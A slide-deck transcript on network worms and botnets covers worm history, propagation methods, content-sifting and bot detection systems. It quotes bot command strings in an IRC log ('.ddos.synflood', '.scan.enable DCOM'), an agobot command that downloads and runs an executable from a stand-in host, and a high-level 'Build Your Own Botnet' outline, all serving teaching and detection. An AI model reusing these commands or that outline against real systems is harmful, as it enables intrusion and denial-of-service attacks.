1 / 41

Network Worms and Bots  

Network Worms and Bots   . Outline . Worms Worm examples and propagation methods Detection methods Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking Disabling worms Generate signatures for network or host-based filters Bots Structure and use of bots

tamyra
Télécharger la présentation

Network Worms and Bots  

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Network Worms and Bots  

  2. Outline • Worms • Worm examples and propagation methods • Detection methods • Traffic patterns: EarlyBird • Vulnerabilities: Generic Exploit Blocking • Disabling worms • Generate signatures for network or host-based filters • Bots • Structure and use of bots • Recognizing bot propagation • Recognizing bot operation • Network-based methods • Host-based methods

  3. Worm • A worm is self-replicating software designed to spread through the network • Typically, exploit security flaws in widely used services • Can cause enormous damage • Launch DDOS attacks, install bot networks • Access sensitive information • Cause confusion by corrupting the sensitive information • Worm vs Virus vs Trojan horse • A virus is code embedded in a file or program • Viruses and Trojan horses rely on human intervention • Worms are self-contained and may spread autonomously

  4. Cost of worm attacks • Morris worm, 1988 • Infected approximately 6,000 machines • 10% of computers connected to the Internet • cost ~ $10 million in downtime and cleanup • Code Red worm, July 16 2001 • Direct descendant of Morris’ worm • Infected more than 500,000 servers • Programmed to go into infinite sleep mode July 28 • Caused ~ $2.6 Billion in damages, • Love Bug worm: $8.75 billion Statistics: Computer Economics Inc., Carlsbad, California

  5. Internet Worm (First major attack) • Released November 1988 • Program spread through Digital, Sun workstations • Exploited Unix security vulnerabilities • VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code • Consequences • No immediate damage from program itself • Replication and threat of damage • Load on network, systems used in attack • Many systems shut down to prevent further attack

  6. Some historical worms of note Kienzle and Elder

  7. Increasing propagation speed • Code Red, July 2001 • Affects Microsoft Index Server 2.0, • Windows 2000 Indexing service on Windows NT 4.0. • Windows 2000 that run IIS 4.0 and 5.0 Web servers • Exploits known buffer overflow in Idq.dll • Vulnerable population (360,000 servers) infected in 14 hours • SQL Slammer, January 2003 • Affects in Microsoft SQL 2000 • Exploits known buffer overflow vulnerability • Server Resolution service vulnerability reported June 2002 • Patched released in July 2002 Bulletin MS02-39 • Vulnerable population infected in less than 10 minutes

  8. Code Red • Initial version released July 13, 2001 • Sends its code as an HTTP request • HTTP request exploits buffer overflow • Malicious code is not stored in a file • Placed in memory and then run • When executed, • Worm checks for the file C:\Notworm • If file exists, the worm thread goes into infinite sleep state • Creates new threads • If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses

  9. Code Red of July 13 and July 19 • Initial release of July 13 • 1st through 20th month: Spread • via random scan of 32-bit IP addr space • 20th through end of each month: attack. • Flooding attack against 198.137.240.91 (www.whitehouse.gov) • Failure to seed random number generator  linear growth • Revision released July 19, 2001. • White House responds to threat of flooding attack by changing the address of www.whitehouse.gov • Causes Code Red to die for date ≥ 20th of the month. • But: this time random number generator correctly seeded Slides: Vern Paxson

  10. Code Red 2 • Released August 4, 2001. • Comment in code: “Code Red 2.” • But in fact completely different code base. • Payload: a root backdoor, resilient to reboots. • Bug: crashes NT, only works on Windows 2000. • Localized scanning: prefers nearby addresses. • Kills Code Red 1. • Safety valve: programmed to die Oct 1, 2001. Slides: Vern Paxson

  11. Striving for Greater Virulence: Nimda • Released September 18, 2001. • Multi-mode spreading: • attack IIS servers via infected clients • email itself to address book as a virus • copy itself across open network shares • modifying Web pages on infected servers w/ client exploit • scanning for Code Red II backdoors (!) • worms form an ecosystem! • Leaped across firewalls. Slides: Vern Paxson

  12. Code Red 2 kills off Code Red 1 Nimda enters the ecosystem CR 1 returns thanksto bad clocks Code Red 2 settles into weekly pattern Code Red 2 dies off as programmed Slides: Vern Paxson

  13. How do worms propagate? • Scanning worms • Worm chooses “random” address • Coordinated scanning • Different worm instances scan different addresses • Flash worms • Assemble tree of vulnerable hosts in advance, propagate along tree • Not observed in the wild, yet • Potential for 106 hosts in < 2 sec ! [Staniford] • Meta-server worm • Ask server for hosts to infect (e.g., Google for “powered by phpbb”) • Topological worm: • Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”) • Contagion worm • Propagate parasitically along with normally initiated communication

  14. Worm Detection and Defense • Detect via honeyfarms: collections of “honeypots” • Any outbound connection from honeyfarm = worm. (at least, that’s the theory) • Distill signature from inbound/outbound traffic. • If honeypotcovers N addresses, expect detection when worm has infected 1/N of population. • Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts • 5 minutes to several weeks to write a signature • Several hours or more for testing

  15. Signature inference • Monitor network and look for strings common to traffic with worm-like behavior • Signatures can then be used for content filtering Slide: S Savage

  16. Content sifting • Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...) • Two consequences • Content Prevalence: W will be more common in traffic than other bitstrings of the same length • Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations • Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic Slide: S Savage

  17. Detector in network B A C cnn.com E D Address Dispersion Table Sources Destinations Prevalence Table The basic algorithm (Stefan Savage, UCSD *)

  18. Detector in network B A C cnn.com E D Address Dispersion Table Sources Destinations Prevalence Table 1 1 (A) 1 (B) The basic algorithm (Stefan Savage, UCSD *)

  19. Detector in network B A C cnn.com E D Address Dispersion Table Sources Destinations Prevalence Table 1 1 (A) 1 (B) 1 1 (C) 1 (A) The basic algorithm (Stefan Savage, UCSD *)

  20. Detector in network B A C cnn.com E D Address Dispersion Table Sources Destinations Prevalence Table 2 2 (A,B) 2 (B,D) 1 1 (C) 1 (A) The basic algorithm (Stefan Savage, UCSD *)

  21. Detector in network B A C cnn.com E D Address Dispersion Table Sources Destinations Prevalence Table 3 3 (A,B,D) 3 (B,D,E) 1 1 (C) 1 (A) The basic algorithm (Stefan Savage, UCSD *)

  22. Challenges • Computation • To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps… • Dominated by memory references; state expensive • Content sifting requires looking at every byte in a packet • State • On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table • Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM (Stefan Savage, UCSD *)

  23. Worm summary • Worm attacks • Many ways for worms to propagate • Propagation time is increasing • Polymorphic worms, other barriers to detection • Detect • Traffic patterns: EarlyBird • Watch attack: TaintCheck and Sting • Look at vulnerabilities: Generic Exploit Blocking • Disable • Generate worm signatures and use in network or host-based filters

  24. Botnet • Collection of compromised hosts • Spread like worms and viruses • Once installed, respond to remote commands • Platform for many attacks • Spam forwarding (70% of all spam?) • Click fraud • Keystroke logging • Distributed denial of service attacks • Serious problem • Top concern of banks, online merchants • Vint Cerf: ¼ of hosts connected to Internet

  25. What are botnets used for? Capabilities are exercised via remote commands.

  26. FreeBSD Attacker Mac OS X Building a Bot Network compromise attempt Win XP compromise attempt compromise attempt compromise attempt Win XP

  27. FreeBSD Attacker Mac OS X Building a Bot Network compromise attempt Win XP compromised install bot software compromise attempt compromise attempt compromise attempt Win XP compromised install bot software

  28. Win XP . . . /connect jade.va.us.dal.net /join #hacker . . . Step 2 Win XP Win XP . . . /connect jade.va.us.dal.net /join #hacker . . . . . . /connect jade.va.us.dal.net /join #hacker . . . jade.va.dal.net

  29. Step 3 (12:59:27pm) -- A9-pcgbdv (A9-pcgbdv@140.134.36.124) has joined (#owned) Users : 1646 (12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62 (12:59:27pm) -- A6-bpxufrd (A6-bpxufrd@wp95-81.introweb.nl) has joined (#owned) Users : 1647 (12:59:27pm) -- A9-nzmpah (A9-nzmpah@140.122.200.221) has left IRC (Connection reset by peer) (12:59:28pm) (@PhaTTy) .scan.enable DCOM (12:59:28pm) -- A9-tzrkeasv (A9-tzrkeas@220.89.66.93) has joined (#owned) Users : 1650

  30. Spam service • Rent-a-bot • Cash-out • Pump and dump • Botnet rental

  31. Underground commerce • Market in access to bots • Botherd: Collects and manages bots • Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface • Sample rates • Non-exclusive access to botnet: 10¢ per machine • Exclusive access: 25¢. • Payment via compromised account (eg PayPal) or cash to dropbox • Identity Theft • Keystroke logging • Complete identities available for $25 - $200+ • Rates depend on financial situation of compromised person • Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner • At $200+, usually includes full credit report [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]

  32. Sobig.a In Action • Arrives as an email attachment • Written in C++ • Encrypted with Telock to slow analysis • User opens attachment, launching trojan • Downloads file from a free Geocities account • Contains list of URLs pointing to second stage • Fetches second-stage trojan • Arbitrary executable file – could be anything • For Sobig.a, second-stage trojan is Lala

  33. Stage 2 – Lala • Communication • Lala notifies a cgi script on a compromised host • Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author • Installation • Lala installs a keylogger and password-protected Lithium remote access trojan. • Lala downloads Stage 3 trojan • Wingate proxy (commercial software) • Cleanup • Lala removes the Sobig.a trojan

  34. Stage 3 – Wingate • Wingate is a general-purpose port proxy server • 555/TCP – RTSP 608/TCP – Remote Control Service • 1180/TCP – SOCKS 1181/TCP – Telnet Proxy • 1182/TCP – WWW Proxy 1183/TCP – FTP Proxy • 1184/TCP – POP3 Proxy 1185/TCP – SMTP Server • Final state of compromised machine • Complete remote control by Lithium client with password “adm123” • Complete logging of user’s keystrokes • Usable for spam relay, http redirects • Wingate Gatekeeper client can connect to 608/TCP, can log/change everything

  35. Build Your Own Botnet • Pick a vector mechanism • IRC Channels: DCC Filesends, Website Adverts to Exploit Sites • Scan & Sploit: MSBlast • Trojan: SoBig/BugBear/ActiveX Exploits • Choose a Payload • Backdoors • Agobot, SubSeven, DeepThroat • Most include mechanisms for DDoS, Self-spreading, download/exec arbitrary code, password stealers. • Do it • Compromise an IRC server, or use your own zombied machines • Configure Payload to connect to selected server • Load encryption keys and codes • Release through appropriate compromised systems • Sit back and wait, or start on your next Botnet [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]

  36. Bot detection methods • Signature-based (most AV products) • Rule-based • Monitor outbound network connections (e.g. ZoneAlarm, BINDER) • Block certain ports (25, 6667, ...) • Hybrid: content-based filtering • Match network packet contents to known command strings (keywords) • E.g. Gaobot ddos cmds: .ddos.httpflood • Network traffic monitoring • Wenke Lee, Phil Porras: Bot Hunter, … • Correlate various NIDS alarms to identify “bot infection sequence” • GA Tech: Recognize traffic patterns associated with ddns-based rallying • Stuart Staniford, FireEye • Detect port scanning to identify suspicious traffic • Emulate host with taint tracking to identify exploit

  37. What is botHunter? A Real Case Study Behavior-based Correlation Architectural Overview Introduction Approaches to Privacy-Preserving Correlation A Cyber-TA Distributed Correlation Example – botHunter botHunter Sensors Correlation Framework Example botHunter Output Cyber-TA Integration BotHunter: passive bot detection What is botHunter? • Snort-based sensor suite for malware event detection • inbound scan detection • remote to local exploit detection • anomaly detection system for exploits over key TCP protocols • Botnet specific egg download banners, • Victim-to-C&C-based communications exchanges • particularly for IRC bot protocols • Event correlator • combines information from sensors to recognize bots that infect and coordinate with your internal network assets • Submits “bot-detection profiles” to the Cyber-TA repository infrastructure

  38. Botnets network traffic patterns • Unique characteristic: “rallying” • Bots spread like worms and trojans • Payloads may be common backdoors • Centralized control of botnet is characteristic feature • Georgia Tech idea: DNS • Bots installed at network edge • IP addresses may vary, use Dynamic DNS • Bots talk to controller, make DDNS lookup • Pattern of DDNS lookup is easy to spot for common botnets! David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)

  39. BotSwat • Host-based bot detection • Based on idea of remote control commands

  40. What does remote control look like? http.execute <URL> <local_path> • Invoke system calls: • connect, network send and recv, create file, write file, … • On arguments received over the network: • IP to connect to, object to request, file name, … • Botswat premise • We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control” • We can approximate “remote control” as “using data received over the network in a system call argument”

  41. http.execute www.badguy.com/malware.exe C:\WIN\bad.exe agobot 1 3 4 connect(…,www.badguy.com,…) 5 send( …,“…GET /malware.exe…”,…) 7 fcreate(…,“C:\WIN\malware.exe”,…) 8 2 Windows XP NIC 6

More Related